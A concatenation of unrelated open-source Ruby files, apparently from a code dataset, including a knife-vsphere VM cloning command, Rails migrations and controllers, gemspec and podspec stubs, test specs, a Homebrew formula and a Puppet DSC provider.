if get_config(:datastorecluster)
hosts.reject! { |host| !host.datastore.include?(find_datastorecluster(get_config(:datastorecluster))) }
end
fatal_exit "No hosts have the requested DatastoreCluster available! #{get_config(:datastorecluster)}" if hosts.empty?
if get_config(:customization_vlan)
vlan_list = get_config(:customization_vlan).split(",")
vlan_list.each do |network|
hosts.reject! { |host| !host.network.include?(find_network(network)) }
end
end
fatal_exit "No hosts have the requested Network available! #{get_config(:customization_vlan)}" if hosts.empty?
hosts
end
def all_the_hosts
hosts = traverse_folders_for_computeresources(datacenter.hostFolder)
all_hosts = []
hosts.each do |host|
if host.is_a? RbVmomi::VIM::ClusterComputeResource
all_hosts.concat(host.host)
else
all_hosts.push host
end
end
all_hosts
end
def find_host(host_name)
host = all_the_hosts.find { |host| host.name == host_name }
raise "Can't find #{host_name}. I found #{all_the_hosts.map(&:name)}" unless host
host
end
# Builds a CloneSpec
def generate_clone_spec(src_config)
rspec = RbVmomi::VIM.VirtualMachineRelocateSpec
case
when get_config(:host)
rspec.host = find_host(get_config(:host))
hosts = find_available_hosts
rspec.pool = hosts.first.resourcePool
when get_config(:resource_pool)
rspec.pool = find_pool(get_config(:resource_pool))
else
hosts = find_available_hosts
rspec.pool = hosts.first.resourcePool
end
rspec.diskMoveType = :moveChildMostDiskBacking if get_config(:linked_clone)
if get_config(:datastore)
rspec.datastore = find_datastore(get_config(:datastore))
end
if get_config(:datastorecluster)
dsc = find_datastorecluster(get_config(:datastorecluster))
dsc.childEntity.each do |store|
if rspec.datastore.nil? || rspec.datastore.summary[:freeSpace] < store.summary[:freeSpace]
rspec.datastore = store
end
end
end
rspec.transform = :sparse if get_config(:thin_provision)
is_template = !get_config(:mark_as_template).nil?
clone_spec = RbVmomi::VIM.VirtualMachineCloneSpec(location: rspec, powerOn: false, template: is_template)
clone_spec.config = RbVmomi::VIM.VirtualMachineConfigSpec(deviceChange: [])
if get_config(:annotation)
clone_spec.config.annotation = get_config(:annotation)
end
if get_config(:customization_cpucount)
clone_spec.config.numCPUs = get_config(:customization_cpucount)
end
if get_config(:customization_corespersocket)
clone_spec.config.numCoresPerSocket = get_config(:customization_corespersocket)
end
if get_config(:customization_memory)
clone_spec.config.memoryMB = Integer(get_config(:customization_memory)) * 1024
end
if get_config(:customization_memory_reservation)
clone_spec.config.memoryAllocation = RbVmomi::VIM.ResourceAllocationInfo reservation: Integer(Float(get_config(:customization_memory_reservation)) * 1024)
end
mac_list = if get_config(:customization_macs) == AUTO_MAC
[AUTO_MAC] * get_config(:customization_ips).split(",").length
else
get_config(:customization_macs).split(",")
end
if get_config(:customization_sw_uuid)
unless get_config(:customization_vlan)
abort("Must specify VLANs with --cvlan when specifying switch UUIDs with --sw-uuids")
end
swuuid_list = if get_config(:customization_sw_uuid) == "auto"
["auto"] * get_config(:customization_ips).split(",").length
else
get_config(:customization_sw_uuid).split(",").map { |swuuid| swuuid.gsub(/((\w+\s+){7})(\w+)\s+(.+)/, '\1\3-\4') }
end
end
if get_config(:customization_vlan)
vlan_list = get_config(:customization_vlan).split(",")
sw_uuid = get_config(:customization_sw_uuid)
networks = vlan_list.map { |vlan| find_network(vlan, sw_uuid) }
cards = src_config.hardware.device.grep(RbVmomi::VIM::VirtualEthernetCard)
networks.each_with_index do |network, index|
card = cards[index] || abort("Can't find source network card to customize for vlan #{vlan_list[index]}")
begin
if get_config(:customization_sw_uuid) && (swuuid_list[index] != "auto")
switch_port = RbVmomi::VIM.DistributedVirtualSwitchPortConnection(
switchUuid: swuuid_list[index], portgroupKey: network.key
)
else
switch_port = RbVmomi::VIM.DistributedVirtualSwitchPortConnection(
switchUuid: network.config.distributedVirtualSwitch.uuid, portgroupKey: network.key
)
end
card.backing.port = switch_port
rescue
# not connected to a distibuted switch?
card.backing = RbVmomi::VIM::VirtualEthernetCardNetworkBackingInfo(network: network, deviceName: network.name)
end
card.macAddress = mac_list[index] if get_config(:customization_macs) && mac_list[index] != AUTO_MAC
dev_spec = RbVmomi::VIM.VirtualDeviceConfigSpec(device: card, operation: "edit")
clone_spec.config.deviceChange.push dev_spec
end
end
cust_spec = if get_config(:customization_spec)
csi = find_customization(get_config(:customization_spec)) ||
fatal_exit("failed to find customization specification named #{get_config(:customization_spec)}")
csi.spec
else
global_ipset = RbVmomi::VIM.CustomizationGlobalIPSettings
identity_settings = RbVmomi::VIM.CustomizationIdentitySettings
RbVmomi::VIM.CustomizationSpec(globalIPSettings: global_ipset, identity: identity_settings)
end
if get_config(:disable_customization)
clone_spec.customization = get_config(:customization_spec) ? cust_spec : nil
return clone_spec
end
if get_config(:customization_dns_ips)
cust_spec.globalIPSettings.dnsServerList = get_config(:customization_dns_ips).split(",")
end
if get_config(:customization_dns_suffixes)
cust_spec.globalIPSettings.dnsSuffixList = get_config(:customization_dns_suffixes).split(",")
end
if config[:customization_ips] != NO_IPS
cust_spec.nicSettingMap = config[:customization_ips].split(",").map.with_index { |cust_ip, index|
generate_adapter_map(cust_ip, get_config(:customization_gw), mac_list[index])
}
end
# TODO: why does the domain matter?
use_ident = config[:customization_hostname] || get_config(:customization_domain) || cust_spec.identity.props.empty?
# TODO: How could we not take this? Only if the identity were empty, but that's statically defined as empty above
if use_ident
hostname = config[:customization_hostname] || vmname
if windows?(src_config)
# We should get here with the customizations set, either by a plugin or a --cspec
fatal_exit "Windows clones need a customization identity. Try passing a --cspec or making a --cplugin" if cust_spec.identity.props.empty?
identification = identification_for_spec(cust_spec)
if cust_spec.identity.licenseFilePrintData
license_file_print_data = RbVmomi::VIM.CustomizationLicenseFilePrintData(
autoMode: cust_spec.identity.licenseFilePrintData.autoMode
)
end # optional param
user_data = RbVmomi::VIM.CustomizationUserData(
fullName: cust_spec.identity.userData.fullName,
orgName: cust_spec.identity.userData.orgName,
productId: cust_spec.identity.userData.productId,
computerName: RbVmomi::VIM.CustomizationFixedName(name: hostname)
)
gui_unattended = RbVmomi::VIM.CustomizationGuiUnattended(
autoLogon: cust_spec.identity.guiUnattended.autoLogon,
autoLogonCount: cust_spec.identity.guiUnattended.autoLogonCount,
password: RbVmomi::VIM.CustomizationPassword(
plainText: cust_spec.identity.guiUnattended.password.plainText,
value: cust_spec.identity.guiUnattended.password.value
),
timeZone: cust_spec.identity.guiUnattended.timeZone
)
runonce = RbVmomi::VIM.CustomizationGuiRunOnce(
commandList: ["cust_spec.identity.guiUnattended.commandList"]
)
ident = RbVmomi::VIM.CustomizationSysprep
ident.guiRunOnce = runonce
ident.guiUnattended = gui_unattended
ident.identification = identification
ident.licenseFilePrintData = license_file_print_data
ident.userData = user_data
cust_spec.identity = ident
elsif linux?(src_config)
ident = RbVmomi::VIM.CustomizationLinuxPrep
ident.hostName = RbVmomi::VIM.CustomizationFixedName(name: hostname)
ident.domain = if get_config(:customization_domain)
get_config(:customization_domain)
else
""
end
cust_spec.identity = ident
else
ui.error("Customization only supports Linux and Windows currently.")
exit 1
end
end
clone_spec.customization = cust_spec
if customization_plugin && customization_plugin.respond_to?(:customize_clone_spec)
clone_spec = customization_plugin.customize_clone_spec(src_config, clone_spec)
end
clone_spec
end
# Loads the customization plugin if one was specified
# @return [KnifeVspherePlugin] the loaded and initialized plugin or nil
def customization_plugin
if @customization_plugin.nil?
cplugin_path = get_config(:customization_plugin)
if cplugin_path
if File.exist? cplugin_path
require cplugin_path
else
abort "Customization plugin could not be found at #{cplugin_path}"
end
if Object.const_defined? "KnifeVspherePlugin"
@customization_plugin = Object.const_get("KnifeVspherePlugin").new
cplugin_data = get_config(:customization_plugin_data)
if cplugin_data
if @customization_plugin.respond_to?(:data=)
@customization_plugin.data = cplugin_data
else
abort "Customization plugin has no :data= accessor to receive the --cplugin-data argument. Define both or neither."
end
end
else
abort "KnifeVspherePlugin class is not defined in #{cplugin_path}"
end
end
end
@customization_plugin
end
# Retrieves a CustomizationSpecItem that matches the supplied name
# @param name [String] name of customization
# @return [RbVmomi::VIM::CustomizationSpecItem]
def find_customization(name)
csm = vim_connection.serviceContent.customizationSpecManager
csm.GetCustomizationSpec(name: name)
end
# Generates a CustomizationAdapterMapping (currently only single IPv4 address) object
# @param ip [String] Any static IP address to use, or "dhcp" for DHCP
# @param gw [String] If static, the gateway for the interface, otherwise network address + 1 will be used
# @return [RbVmomi::VIM::CustomizationIPSettings]
def generate_adapter_map(ip = nil, gw = nil, mac = nil)
settings = RbVmomi::VIM.CustomizationIPSettings
if ip.nil? || ip.casecmp("dhcp") == 0
settings.ip = RbVmomi::VIM::CustomizationDhcpIpGenerator.new
else
cidr_ip = NetAddr::CIDR.create(ip)
settings.ip = RbVmomi::VIM::CustomizationFixedIp(ipAddress: cidr_ip.ip)
settings.subnetMask = cidr_ip.netmask_ext
# TODO: want to confirm gw/ip are in same subnet?
# Only set gateway on first IP.
if config[:customization_ips].split(",").first == ip
if gw.nil?
settings.gateway = [cidr_ip.network(Objectify: true).next_ip]
else
gw_cidr = NetAddr::CIDR.create(gw)
settings.gateway = [gw_cidr.ip]
end
end
end
adapter_map = RbVmomi::VIM.CustomizationAdapterMapping
adapter_map.macAddress = mac if !mac.nil? && (mac != AUTO_MAC)
adapter_map.adapter = settings
adapter_map
end
def tcp_test_ssh(hostname, connection_port)
tcp_socket = TCPSocket.new(hostname, connection_port)
readable = IO.select([tcp_socket], nil, nil, 5)
if readable
ssh_banner = tcp_socket.gets
if ssh_banner.nil? || ssh_banner.empty?
false
else
Chef::Log.debug("sshd accepting connections on #{hostname}, banner is #{ssh_banner}")
yield
true
end
else
false
end
rescue SocketError, Errno::ECONNREFUSED, Errno::EHOSTUNREACH, Errno::ENETUNREACH, IOError
Chef::Log.debug("ssh failed to connect: #{hostname}")
sleep 2
false
rescue Errno::EPERM, Errno::ETIMEDOUT
Chef::Log.debug("ssh timed out: #{hostname}")
false
rescue Errno::ECONNRESET
Chef::Log.debug("ssh reset its connection: #{hostname}")
sleep 2
false
ensure
tcp_socket && tcp_socket.close
end
def tcp_test_winrm(hostname, port)
tcp_socket = TCPSocket.new(hostname, port)
yield
true
rescue SocketError
sleep 2
false
rescue Errno::ETIMEDOUT
false
rescue Errno::EPERM
false
rescue Errno::ECONNREFUSED
sleep 2
false
rescue Errno::EHOSTUNREACH
sleep 2
false
rescue Errno::ENETUNREACH
sleep 2
false
ensure
tcp_socket && tcp_socket.close
end
private
def vmname
supplied_hostname || random_hostname
end
def using_random_hostname?
config[:random_vmname]
end
def using_supplied_hostname?
!supplied_hostname.nil?
end
def supplied_hostname
@name_args[0]
end
def random_hostname
@random_hostname ||= config[:random_vmname_prefix] + SecureRandom.hex(4)
end
def bootstrap_nic_index
Integer(get_config(:bootstrap_nic))
end
def identification_for_spec(cust_spec)
# If --cdomain matches what is in --cspec then use identification from the --cspec, else use --cdomain
case domain = get_config(:customization_domain)
when nil?
# Fall back to original behavior of using joinWorkgroup from the --cspec
RbVmomi::VIM.CustomizationIdentification(
joinWorkgroup: cust_spec.identity.identification.joinWorkgroup
)
when cust_spec.identity.identification.joinDomain
cust_spec.identity.identification
else
RbVmomi::VIM.CustomizationIdentification(
joinDomain: domain
)
end
end
end
| 35.056517 | 230 | 0.691551 |
4a45e395aad2af67cd3e29ec8115f4246a6fa07e | 728 | class FixSlipExpiresAt < ActiveRecord::Migration[4.2]
def up
execute <<-SQL
CREATE OR REPLACE FUNCTION public.slip_expires_at(payments)
RETURNS timestamp without time zone
LANGUAGE sql
STABLE
AS $function$
SELECT weekdays_from(public.slip_expiration_weekdays(), public.zone_timestamp($1.created_at))::date + 1 - '1 second'::interval;
$function$
SQL
end
def down
execute <<-SQL
CREATE OR REPLACE FUNCTION public.slip_expires_at(payments)
RETURNS timestamp without time zone
LANGUAGE sql
STABLE
AS $function$
SELECT weekdays_from(public.slip_expiration_weekdays(), public.zone_timestamp($1.created_at))
$function$
SQL
end
end
| 29.12 | 131 | 0.696429 |
628a87c2ef4f4dc8d59c56be0e14628b8984ef97 | 2,842 | # -*- encoding: utf-8 -*-
# stub: rubocop 1.1.0 ruby lib
Gem::Specification.new do |s|
s.name = "rubocop".freeze
s.version = "1.1.0"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.metadata = { "bug_tracker_uri" => "https://github.com/rubocop-hq/rubocop/issues", "changelog_uri" => "https://github.com/rubocop-hq/rubocop/blob/master/CHANGELOG.md", "documentation_uri" => "https://docs.rubocop.org/rubocop/1.1/", "homepage_uri" => "https://rubocop.org/", "source_code_uri" => "https://github.com/rubocop-hq/rubocop/" } if s.respond_to? :metadata=
s.require_paths = ["lib".freeze]
s.authors = ["Bozhidar Batsov".freeze, "Jonas Arvidsson".freeze, "Yuji Nakayama".freeze]
s.bindir = "exe".freeze
s.date = "2020-10-29"
s.description = " RuboCop is a Ruby code style checking and code formatting tool.\n It aims to enforce the community-driven Ruby Style Guide.\n".freeze
s.email = "[email protected]".freeze
s.executables = ["rubocop".freeze]
s.extra_rdoc_files = ["LICENSE.txt".freeze, "README.md".freeze]
s.files = ["LICENSE.txt".freeze, "README.md".freeze, "exe/rubocop".freeze]
s.homepage = "https://github.com/rubocop-hq/rubocop".freeze
s.licenses = ["MIT".freeze]
s.required_ruby_version = Gem::Requirement.new(">= 2.4.0".freeze)
s.rubygems_version = "3.1.4".freeze
s.summary = "Automatic Ruby code style checking tool.".freeze
s.installed_by_version = "3.1.4" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<parallel>.freeze, ["~> 1.10"])
s.add_runtime_dependency(%q<parser>.freeze, [">= 2.7.1.5"])
s.add_runtime_dependency(%q<rainbow>.freeze, [">= 2.2.2", "< 4.0"])
s.add_runtime_dependency(%q<regexp_parser>.freeze, [">= 1.8"])
s.add_runtime_dependency(%q<rexml>.freeze, [">= 0"])
s.add_runtime_dependency(%q<rubocop-ast>.freeze, [">= 1.0.1"])
s.add_runtime_dependency(%q<ruby-progressbar>.freeze, ["~> 1.7"])
s.add_runtime_dependency(%q<unicode-display_width>.freeze, [">= 1.4.0", "< 2.0"])
s.add_development_dependency(%q<bundler>.freeze, [">= 1.15.0", "< 3.0"])
else
s.add_dependency(%q<parallel>.freeze, ["~> 1.10"])
s.add_dependency(%q<parser>.freeze, [">= 2.7.1.5"])
s.add_dependency(%q<rainbow>.freeze, [">= 2.2.2", "< 4.0"])
s.add_dependency(%q<regexp_parser>.freeze, [">= 1.8"])
s.add_dependency(%q<rexml>.freeze, [">= 0"])
s.add_dependency(%q<rubocop-ast>.freeze, [">= 1.0.1"])
s.add_dependency(%q<ruby-progressbar>.freeze, ["~> 1.7"])
s.add_dependency(%q<unicode-display_width>.freeze, [">= 1.4.0", "< 2.0"])
s.add_dependency(%q<bundler>.freeze, [">= 1.15.0", "< 3.0"])
end
end
| 53.622642 | 368 | 0.668543 |
18c33ac55806260d54b319c8a0ee279b42b9e298 | 1,407 | # == Schema Information
#
# Table name: projects
#
# id :integer not null, primary key
# title :string not null
# description :string
# created_at :datetime not null
# updated_at :datetime not null
# icon_file_name :string
# icon_content_type :string
# icon_file_size :integer
# icon_updated_at :datetime
# base64_icon_data :text
# slug :string not null
# organization_id :integer not null
# aasm_state :string
# long_description_body :text
# long_description_markdown :text
# open_posts_count :integer default(0), not null
# closed_posts_count :integer default(0), not null
#
FactoryGirl.define do
factory :project do
sequence(:title) { |n| "Project#{n}" }
sequence(:description) { |n| "Project description #{n}" }
sequence(:long_description_markdown) { |n| "Long project description #{n}" }
association :organization
trait :with_s3_icon do
after(:build) do |project, evaluator|
project.icon_file_name = 'project.jpg'
project.icon_content_type = 'image/jpeg'
project.icon_file_size = 1024
project.icon_updated_at = Time.now
end
end
end
end
| 33.5 | 80 | 0.567875 |
1ce6ba2251bcad7fe3da63406a90578e2fe1df7f | 158 | describe command('curl http://localhost:9093/metrics') do
its('exit_status') { should eq 0 }
its('stdout') { should match(/go_gc_duration_seconds/) }
end
| 31.6 | 58 | 0.71519 |
e99c5c2089a5a28a9026384ea38c77d88246483d | 1,459 | Pod::Spec.new do |spec|
# ――― Spec Metadata ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.name = "EthosText"
spec.version = "0.1.9"
spec.summary = "A collection of useful building blocks to help rapidly develop iOS apps using Swift"
spec.description = <<-DESC
A collection of useful building blocks to help rapidly develop iOS apps using Swift and more
DESC
spec.homepage = "https://github.com/egouletlang/Ethos"
# ――― Spec License ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.license = "MIT (example)"
spec.license = { :type => 'MIT', :file => 'LICENSE' }
# ――― Author Metadata ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.author = { "Etienne Goulet-Lang" => "[email protected]" }
# spec.social_media_url = "https://twitter.com/egouletlang"
# ――― Platform Specifics ――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.swift_version = '4.2'
spec.platform = :ios, '11.0'
# ――― Source Location ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.source = { :git => "https://github.com/egouletlang/Ethos.git", :tag => "v0.5.44" }
spec.source_files = 'EthosText/EthosText/**/*.{h,m,swift}'
# ――― Dependencies ――――――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
spec.dependency 'EthosUtil'
end
| 37.410256 | 107 | 0.446196 |
799bb33edbf5e14b86b550bd76ef8ab7202d252b | 139 | class AddHstore < ActiveRecord::Migration
def up
enable_extension :hstore
end
def down
disable_extension :hstore
end
end | 15.444444 | 43 | 0.726619 |
ab59a1bfca1c5699aedf99ec36674892a74b09ad | 1,203 | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
require 'google/apis/blogger_v3/service.rb'
require 'google/apis/blogger_v3/classes.rb'
require 'google/apis/blogger_v3/representations.rb'
module Google
module Apis
# Blogger API
#
# API for access to the data within Blogger.
#
# @see https://developers.google.com/blogger/docs/3.0/getting_started
module BloggerV3
VERSION = 'V3'
REVISION = '20190917'
# Manage your Blogger account
AUTH_BLOGGER = 'https://www.googleapis.com/auth/blogger'
# View your Blogger account
AUTH_BLOGGER_READONLY = 'https://www.googleapis.com/auth/blogger.readonly'
end
end
end
| 31.657895 | 80 | 0.727348 |
033121bb1f70e282990189ec3a520b93c62f84b3 | 2,848 | class Metricbeat < Formula
desc "Collect metrics from your systems and services"
homepage "https://www.elastic.co/beats/metricbeat"
url "https://github.com/elastic/beats.git",
tag: "v7.13.1",
revision: "2d80f6e99f41b65a270d61706fa98d13cfbda18d"
license "Apache-2.0"
head "https://github.com/elastic/beats.git"
bottle do
sha256 cellar: :any_skip_relocation, arm64_big_sur: "a287b24bc4128d7305b7bb2b039adb5f912e9cae13e69080f67ff836e833dbff"
sha256 cellar: :any_skip_relocation, big_sur: "d78fec2894a40070d01fa89fd2ced85e829d1b9e9c240a3d890259dbbb9060eb"
sha256 cellar: :any_skip_relocation, catalina: "94c41bdd226dd43a1da8ae038a4e59eb7417d848bc5c9a75a5a7e2fdca8ba2dc"
sha256 cellar: :any_skip_relocation, mojave: "ca4cff77fa3623f81c337b739eec36170e4affafde09ded62caafe4c13b2bbab"
end
depends_on "go" => :build
depends_on "mage" => :build
depends_on "[email protected]" => :build
def install
# remove non open source files
rm_rf "x-pack"
cd "metricbeat" do
# don't build docs because it would fail creating the combined OSS/x-pack
# docs and we aren't installing them anyway
inreplace "magefile.go", "mg.Deps(CollectDocs, FieldsDocs)", ""
system "mage", "-v", "build"
ENV.deparallelize
system "mage", "-v", "update"
(etc/"metricbeat").install Dir["metricbeat.*", "fields.yml", "modules.d"]
(libexec/"bin").install "metricbeat"
prefix.install "build/kibana"
end
(bin/"metricbeat").write <<~EOS
#!/bin/sh
exec #{libexec}/bin/metricbeat \
--path.config #{etc}/metricbeat \
--path.data #{var}/lib/metricbeat \
--path.home #{prefix} \
--path.logs #{var}/log/metricbeat \
"$@"
EOS
end
plist_options manual: "metricbeat"
def plist
<<~EOS
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN"
"http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>#{plist_name}</string>
<key>Program</key>
<string>#{opt_bin}/metricbeat</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
EOS
end
test do
(testpath/"config/metricbeat.yml").write <<~EOS
metricbeat.modules:
- module: system
metricsets: ["load"]
period: 1s
output.file:
enabled: true
path: #{testpath}/data
filename: metricbeat
EOS
(testpath/"logs").mkpath
(testpath/"data").mkpath
fork do
exec bin/"metricbeat", "-path.config", testpath/"config", "-path.data",
testpath/"data"
end
sleep 30
assert_predicate testpath/"data/metricbeat", :exist?
end
end
| 30.297872 | 122 | 0.63132 |
bbb27f895418dca3b1e31e69f6957c84a03510e6 | 466 | require 'mustache'
module RspecApiDocumentation
module Views
class MarkupIndex < Mustache
def initialize(index, configuration)
@index = index
@configuration = configuration
self.template_path = configuration.template_path
end
def api_name
@configuration.api_name
end
def sections
RspecApiDocumentation::Writers::IndexHelper.sections(examples, @configuration)
end
end
end
end
| 21.181818 | 86 | 0.678112 |
26b82610e62e00bd682c8789591202099a5cccf1 | 1,185 | # frozen_string_literal: true
require 'test_helper'
require 'skippy/library'
class SkippyLibraryTest < Skippy::Test
def test_that_it_can_load_library_info
lib_path = fixture('my_lib')
library = Skippy::Library.new(lib_path)
assert_equal(lib_path, library.path)
assert_equal('my-lib', library.name)
assert_equal('1.2.3', library.version)
end
def test_that_it_fails_when_library_path_does_not_exist
assert_raises(Skippy::Library::LibraryNotFoundError) do
Skippy::Library.new('./bogus/path')
end
end
def test_that_it_can_find_library_modules
lib_path = fixture('my_lib')
library = Skippy::Library.new(lib_path)
assert_all_kind_of(Skippy::LibModule, library.modules)
assert_same_elements(
%w(my-lib/command my-lib/geometry my-lib/tool),
library.modules.map(&:to_s)
)
end
def test_that_it_return_its_name
lib_path = fixture('my_lib')
library = Skippy::Library.new(lib_path)
assert_equal('my-lib', library.name)
end
def test_that_it_convert_to_string_as_name
lib_path = fixture('my_lib')
library = Skippy::Library.new(lib_path)
assert_equal('my-lib', library.to_s)
end
end
| 26.333333 | 59 | 0.731646 |
26492db99a875fc9a2d835ef5fd948aa77e8b894 | 797 | ##
# Copyright 2015, Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##
# Be sure to restart your server when you modify this file.
# Configure sensitive parameters which will be filtered from the log file.
Rails.application.config.filter_parameters += [:password]
| 37.952381 | 76 | 0.742785 |
6aaeaa96058158f0d2aa3d44f817000f650d3cd7 | 2,240 | # frozen_string_literal: true
class IdeasController < ApplicationController
before_action :authenticate_user!
before_action :set_idea, only: %i[show edit update destroy submit]
# GET /ideas
# GET /ideas.json
def index
@ideas = case params[:view]
when 'assigned'
Idea.where(assigned_user_id: [current_user.id])
when 'submitted'
Idea.where.not(submission_date: [nil, ''])
else
Idea.all
end
end
# GET /ideas/1
# GET /ideas/1.json
def show; end
# GET /ideas/new
def new
@idea = Idea.new
end
# GET /ideas/1/edit
def edit; end
# POST /ideas
def create
@idea = current_user.ideas.new(idea_params)
if @idea.save
redirect_to @idea, notice: 'Idea was successfully created.'
else
render :new
end
end
# PATCH/PUT /ideas/1
def update
if @idea.update(idea_params)
redirect_to @idea, notice: 'Idea was successfully updated.'
else
render :edit
end
end
# DELETE /ideas/1
def destroy
@idea.destroy
redirect_to ideas_url, notice: 'Idea was successfully destroyed.'
end
def submit
@idea.submission_date = Time.now
@idea.status = Idea.statuses[:awaiting_approval]
if @idea.save
redirect_to @idea, notice: 'Idea was successfully submitted.'
else
render :edit
end
end
private
# Use callbacks to share common setup or constraints between actions.
def set_idea
@idea = Idea.find(params[:id] || params[:idea_id])
end
# Never trust parameters from the scary internet, only allow the white list through.
def idea_params
if current_user.admin?
params.require(:idea).permit(
:area_of_interest,
:business_area,
:it_system,
:title,
:idea,
:benefits,
:impact,
:involvement,
:assigned_user_id,
:participation_level,
:status,
:review_date
)
else
params.require(:idea).permit(
:area_of_interest,
:business_area,
:it_system,
:title,
:idea,
:benefits,
:impact,
:involvement,
:status
)
end
end
end
| 21.132075 | 86 | 0.603125 |
3300839f7d028a8819da0ca6741a4522c38b8296 | 764 | #!/usr/bin/ruby
# STEPS TO RUNNING BULK-EXTRACT FROM SCRATCH
#start mongod
#run sli/config/scripts/resetAllDbs.sh to clean database
#start activemq
#start api to bootstrap database
#start search indexer
#bundle exec rake realmInit
#bundle exec rake importSandboxData
#run ./compile_local_extract_jar.rb
#then run this script! ./start_local_extract.rb
# configuration variables
sli_conf="../../config/properties/sli.properties"
sli_keystore="../../data-access/dal/keyStore/ciKeyStore.jks"
bulk_extract_jar=`ls ../target/bulk-extract-*.jar`
tenant="Midgar"
is_delta="false"
# run it!
puts "starting extract"
`java -Xms1G -Xmx2G -Dsli.conf=#{sli_conf} -Dsli.encryption.keyStore=#{sli_keystore} -jar #{bulk_extract_jar} #{tenant} #{is_delta}`
puts "post extract"
| 28.296296 | 132 | 0.769634 |
035e8916166481692f95c6efbb3ee6cf15fcdab0 | 1,117 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Audit::Events::Preloader do
describe '.preload!' do
let_it_be(:audit_events) { create_list(:audit_event, 2) }
let(:audit_events_relation) { AuditEvent.where(id: audit_events.map(&:id)) }
subject { described_class.preload!(audit_events_relation) }
it 'returns an ActiveRecord::Relation' do
expect(subject).to be_an(ActiveRecord::Relation)
end
it 'preloads associated records' do
log = ActiveRecord::QueryRecorder.new do
subject.map do |event|
[event.author_name, event.lazy_entity.name]
end
end
# Expected queries when requesting for AuditEvent with associated records
#
# 1. On the audit_events table
# SELECT "audit_events".* FROM "audit_events"
# 2. On the users table for author_name
# SELECT "users".* FROM "users" WHERE "users"."id" IN (1, 3)
# 3. On the users table for entity name
# SELECT "users".* FROM "users" WHERE "users"."id" IN (2, 4)
#
expect(log.count).to eq(3)
end
end
end
| 30.189189 | 80 | 0.652641 |
b93bc6f65dea3f1bce856c6be3c57164165c9319 | 359 | class ContactsController < ApplicationController
def new
@contact = Contact.new
end
def create
@contact = Contact.new(params[:contact])
if @contact.valid?
ContactMailer.message_from_user(@contact).deliver_now
flash[:info] = "Thank you for your message!"
redirect_to root_path
else
render 'new'
end
end
end
| 21.117647 | 59 | 0.679666 |
876db06a2b9eafe093adffc1cefdc1307c6808d9 | 5,980 | require 'pathname'
require 'json'
require_relative '../../../puppet_x/puppetlabs/dsc_lite/powershell_hash_formatter'
Puppet::Type.type(:base_dsc_lite).provide(:powershell) do
confine feature: :pwshlib
confine operatingsystem: :windows
defaultfor operatingsystem: :windows
commands powershell: (if File.exist?("#{ENV['SYSTEMROOT']}\\sysnative\\WindowsPowershell\\v1.0\\powershell.exe")
"#{ENV['SYSTEMROOT']}\\sysnative\\WindowsPowershell\\v1.0\\powershell.exe"
elsif File.exist?("#{ENV['SYSTEMROOT']}\\system32\\WindowsPowershell\\v1.0\\powershell.exe")
"#{ENV['SYSTEMROOT']}\\system32\\WindowsPowershell\\v1.0\\powershell.exe"
else
'powershell.exe'
end)
desc 'Applies DSC Resources by generating a configuration file and applying it.'
DSC_LITE_MODULE_PUPPET_UPGRADE_MSG = <<-UPGRADE.freeze
Currently, the dsc module has reduced functionality on this agent
due to one or more of the following conditions:
- Puppet 3.x (non-x64 version)
Puppet 3.x uses a Ruby version that requires a library to support a colored
console. Unfortunately this library prevents the PowerShell module from
using a shared PowerShell process to dramatically improve the performance of
resource application.
To enable these improvements, it is suggested to upgrade to any x64 version of
Puppet (including 3.x), or to a Puppet version newer than 3.x.
UPGRADE
def self.upgrade_message
Puppet.warning DSC_LITE_MODULE_PUPPET_UPGRADE_MSG unless @upgrade_warning_issued
@upgrade_warning_issued = true
end
def self.vendored_modules_path
File.expand_path(Pathname.new(__FILE__).dirname + '../../../' + 'puppet_x/dsc_resources')
end
def dsc_parameters
resource.parameters_with_value.select do |p|
p.name.to_s =~ %r{dsc_}
end
end
def dsc_property_param
resource.parameters_with_value.select { |pr| pr.name == :properties }.each do |p|
p.name.to_s =~ %r{dsc_}
end
end
def self.template_path
File.expand_path(Pathname.new(__FILE__).dirname)
end
def ps_manager
debug_output = Puppet::Util::Log.level == :debug
Pwsh::Manager.instance(command(:powershell), Pwsh::Manager.powershell_args, debug: debug_output)
end
DSC_LITE_COMMAND_TIMEOUT = 1_200_000 # 20 minutes
def exists?
version = Facter.value(:powershell_version)
Puppet.debug "PowerShell Version: #{version}"
script_content = ps_script_content('test')
Puppet.debug "\n" + self.class.redact_content(script_content)
if Pwsh::Manager.windows_powershell_supported?
output = ps_manager.execute(script_content, DSC_LITE_COMMAND_TIMEOUT)[:stdout]
else
self.class.upgrade_message
output = powershell(Pwsh::Manager.powershell_args, script_content)
end
Puppet.debug "Dsc Resource returned: #{output}"
data = JSON.parse(output)
raise(data['errormessage']) unless data['errormessage'].empty?
exists = data['indesiredstate']
Puppet.debug "Dsc Resource Exists?: #{exists}"
